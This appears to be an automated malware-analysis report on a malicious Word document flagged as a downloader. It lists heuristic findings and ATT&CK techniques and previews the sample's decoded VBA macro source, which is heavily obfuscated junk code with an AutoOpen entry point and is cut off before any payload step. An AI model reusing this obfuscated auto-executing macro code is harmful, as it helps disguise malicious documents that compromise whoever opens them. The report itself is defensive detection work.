MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample is a malicious Office document containing VBA macros. The presence of an AutoOpen macro and the use of GetObject combined with WMI Win32_Process creation strongly indicate an attempt to execute arbitrary code. This is further supported by ClamAV's detection of a "Doc.Downloader" type. The macro's obfuscated nature prevents a definitive analysis of its exact payload, but the overall pattern suggests it is designed to download and execute a second-stage payload.
Heuristics 7
-
ClamAV: Doc.Downloader.00536d-6941907-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.00536d-6941907-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 32269 bytes |
SHA-256: 67539ae37329bf49eb1335ec0e8a12bd4f732cde821c5d1ff5c73b0a5adcc252 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "NGDGxQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "S_AACXQD"
Attribute VB_Base = "0{70959F31-593E-412A-9A0A-39C4C314EA6D}{6640755B-1874-4CD3-A1C7-B1D09AB67CC9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "vcA4ABAQ"
Attribute VB_Base = "0{AECFE2FD-10A3-437B-96D2-F1210DFA7F95}{BB34A576-4813-4113-81DE-246BC69781BB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "MZAACA"
Sub autoopen()
If kAUAQ_AB = QXAAAAx Then
Select Case jDBU_wDU
Case 226449590
WAB41AA = Rnd(rAAAAAAD + 677670062 + 2798646 / vwCAkACU)
CADxX4 = CByte(pBDoAAXQ + 234393663 + lUwUZQAA + 868441809)
Case 156554485
wwAGAUk = LAXBBAXA
AkAcUAA = Tan(NcAUU_A - CSng(LxAkDA))
End Select
End If
If rkQAZwAA = pAZAAAZ Then
Select Case kA4ACA
Case 80623455
LBDDBk = Rnd(uAQDAA + 946247038 + 94711518 / dZAwAAU)
NC4XAAAU = CByte(kDDcAQX + 578789574 + FAAUwZAD + 11133948)
Case 433685152
XDDAAkk = hAGQAXZ1
s4AA4o = Tan(vkAUAQAA - CSng(IwA__x_B))
End Select
End If
If LxQDoAQQ = kQBAXAB Then
Select Case zCQAoc
Case 906699795
qU4AoUB = Rnd(wAGXUQ + 675552437 + 571895460 / PUACAA)
WkADcAkC = CByte(ooAZ1Q4A + 637281627 + Nw1DAXC + 777502892)
Case 438121677
QBAQwoG = WUAAUC
OAD4Q1X = Tan(kAAXAGQ - CSng(RAQQUUw))
End Select
End If
uBAGcC
If qAXc1B = zQAAxDA Then
Select Case wQXAXBAA
Case 612525908
vBC4XC = Rnd(zA_1A4Xc + 251468979 + 164549338 / H1AA_4B)
nAGQABD4 = CByte(DX1DX_Z + 473168191 + tXDUwC + 632693492)
Case 139213862
iDQQXA = YxADwQB
vwGCkQ4A = Tan(wQACwAo - CSng(jQA1UccQ))
End Select
End If
If ICocAA = YoAD4Ak Then
Select Case w4DCAAA
Case 337117213
fAAAUA = Rnd(WAABCX + 680197576 + 909755657 / nUAUA4)
pAA4AGA = CByte(hUBAXDx + 697198569 + TGA1AA + 591693543)
Case 573806582
JB_Z1kA = w4w_GxZD
fQUA_AA = Tan(iXADADDQ - CSng(nDAQoD))
End Select
End If
End Sub
Attribute VB_Name = "iBADUAkX"
Function uBAGcC()
On Error Resume Next
If jQAcAU = sABGBADZ Then
Select Case Fx1AQAxC
Case 411757465
NDBZ1_A = Rnd(nXAABUD + 952478814 + 254718867 / OAxxXADQ)
Q1QZ4o1A = CByte(wBGXAAD + 433126122 + DGQQAZA + 546119096)
Case 280958406
TkQAAw = ZAQGAx
rkCGAU = Tan(hQADDQAo - CSng(dUkAxxC))
End Select
End If
If jXDcQUA = XAAcX4QA Then
Select Case nAQwAAAA
Case 490152013
j4BwCA4A = Rnd(zAAoAGZ + 748850684 + 32846237 / bxAAkCQ)
MBcxQB = CByte(LCAAU1QA + 622645831 + YAA_UDA + 569507069)
Case 647274870
iDQcUAAo = RAQDAA
HAZ4BUXA = Tan(i41GBU1 - CSng(Uo4cAw))
End Select
End If
If 1337 < 24328 Then
zDAAA4 = vbFalse
If fkD1cCDB = HAGAA1oB Then
Select Case DQAckQU_
Case 267900430
nAAUkB = Rnd(LCZBo_B + 654686259 + 33754147 / sAxkGA)
H_Ao1A = CByte(kZUXABk + 236626823 + zQZ1oGU + 42840483)
Case 779844403
v_AGAXxc = bADAAA
PAQwkDU4 = Tan(iZAAkAQ - CSng(bUDkAB))
End Select
End If
If oBZkXQ1_ = hGC4BoB Then
Select Case uAA_UQZ
Case 886016921
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.